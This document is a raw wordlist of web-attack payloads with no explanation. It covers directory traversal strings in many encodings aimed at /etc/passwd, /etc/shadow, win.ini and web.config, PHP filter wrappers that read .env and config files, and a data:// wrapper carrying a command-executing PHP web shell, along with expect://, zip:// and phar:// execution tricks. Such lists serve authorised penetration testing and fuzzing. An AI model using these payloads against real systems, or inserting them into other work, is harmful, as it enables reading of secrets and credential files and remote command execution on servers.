../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
....//
....\/
....\\
..../
....\
%2e%2e/
%2e%2e./
%2e%2e%2f
%2e%2e%5c
%252e%252e/
%252e%252e%252f
%252e%252e%5c
..%2f
..%5c
..%252f
..%255c
..%c0%af
..%c1%9c
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%ae%c0%ae/
..%c0%ae%c0%ae%c0%ae%c0%ae/
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
..%25c0%25af
..%25c1%259c
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
..%252f..%252f
..%252f..%252f..%252f
..%252f..%252f..%252f..%252f
..%252f..%252f..%252f..%252f..%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%u2215
..%u2215..%u2215
..%u2215..%u2215..%u2215
..%u2216
..%u2216..%u2216
..%uEFC8
..%uF025
..%uF029
./././././../
./.././.././../
....//....//
....//....//....//
....//....//....//....//
....\/....\/
....\\....\\....\\
..;/
../;/
..;/../;/
../../;/
..;/..;/
..%00/
..%00../
..%0d/
..%0a/
..%09/
%00../
%00../../
%00../../../
etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
%2fetc%2fpasswd
%2Fetc%2Fpasswd
%2Fetc%2Fshadow
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5cetc/passwd
..%5c..%5c..%5cetc/passwd
..%5c..%5c..%5c..%5cetc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
windows/win.ini
../windows/win.ini
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../../../../windows/win.ini
../../../../../../windows/win.ini
C:/windows/win.ini
C:/boot.ini
C:/inetpub/wwwroot/web.config
C:/WINDOWS/system.ini
C:\WINDOWS\win.ini
C:\boot.ini
../../../../../../windows/win.ini
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=/etc/shadow
php://filter/convert.base64-encode/resource=/proc/self/environ
php://filter/convert.base64-encode/resource=/var/www/html/.env
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/zlib.deflate|convert.base64-encode/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=php://input
php://input
php://stdin
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
data://text/plain,<?php echo shell_exec($_GET['cmd']);?>
expect://id
expect://ls
expect://whoami
zip://shell.jpg%23shell.php
phar://shell.jpg/shell.php
glob://etc/passwd
